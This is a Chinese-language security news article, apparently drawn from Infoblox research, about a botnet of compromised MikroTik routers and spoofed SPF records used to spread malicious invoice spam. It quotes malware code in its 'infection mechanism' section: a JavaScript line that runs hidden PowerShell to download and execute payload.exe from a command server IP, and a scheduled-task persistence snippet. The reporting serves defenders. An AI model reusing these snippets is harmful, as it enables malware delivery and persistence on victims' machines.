11月下旬出现了一场前所未有的僵尸网络攻击活动,该活动结合了DNS配置错误和劫持网络设备这一新颖手段,推动了一场全球性的恶意垃圾邮件行动。
最初的报道浮出水面时,数十家机构收到了看似合法的货运发票,每张发票都包含一个带有恶意JavaScript有效载荷的ZIP压缩包。
脚本执行后,启动了一个PowerShell程序,以连接到62.133.60.137这一远程命令控制服务器,该主机此前与俄罗斯威胁行为者有关联。
Infoblox的分析师发现,底层基础设施依赖于13,000多个被攻陷的MikroTik路由器,这些路由器已被改造成开放的SOCKS4代理。
这个庞大的中继网络不仅增加了电子邮件的发送量,还掩盖了攻击的真正源头,使得传统的基于IP的过滤方法失去了效果。
该活动并非利用单一漏洞,而是利用了许多MikroTik设备出厂时的默认配置或安全性较差的配置。
这些垃圾邮件通过滥用配置错误的SPF记录,伪造了数百个合法域名。
域名所有者无意中——或者通过恶意篡改——用“all”指令配置了他们的TXT记录,这实际上允许任何邮件服务器代表他们发送消息。
结果是DKIM、SPF和DMARC检查被广泛绕过,使得恶意邮件能够绕过邮件过滤器进入企业收件箱。
这个僵尸网络代表了大规模垃圾邮件操作的重大转变,它将网络层的设备入侵与DNS级别的操纵结合在了一起。
打开附带的ZIP压缩包的受害者触发了一个经过混淆处理的JavaScript文件,该文件会部署加载器脚本,这体现了多种策略的无缝结合,旨在最大化感染率并规避检测。
感染机制
该恶意软件的感染链始于ZIP压缩包内一个经过混淆处理的JavaScript文件。
运行时,该脚本会编写并执行一个PowerShell加载器,该加载器会连接到C2服务器以获取更多有效载荷。
下面的JavaScript代码片段展示了PowerShell命令的构建和执行方式:-
var cmd = 'powershell -NoProfile -WindowStyle Hidden -Command ' +
'"$wc = New-Object System.Net.WebClient; ' +
'$wc.DownloadFile(\'http://62.133.60.137/payload.exe\', \'C:\\Users\\Public\\payload.exe\'); ' +
'Start-Process \'C:\\Users\\Public\\payload.exe\'"';
WScript.Shell.Run(cmd, 0, true);加载程序激活后,PowerShell脚本会通过查询Get-ExecutionPolicy来验证其执行上下文。
如果该政策限制脚本运行,恶意软件会使用Set-ExecutionPolicy Bypass -Scope Process暂时绕过限制。
接下来,它通过创建一个名为“Updater”的计划任务来保持持久性,该任务会在用户登录时运行:-
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -File C:\Users\Public\payload.exe'
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Updater' -Description 'System Updater'这种机制确保有效载荷在重启后仍能保持活跃,同时其网络流量通过僵尸网络的SOCKS4代理进行路由。
对合法网络服务和正规DNS记录的依赖模糊了良性活动与恶意活动之间的界限,这给防御者带来了重大挑战,也凸显了进行严格的DNS配置审计和路由器安全加固的迫切需求。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
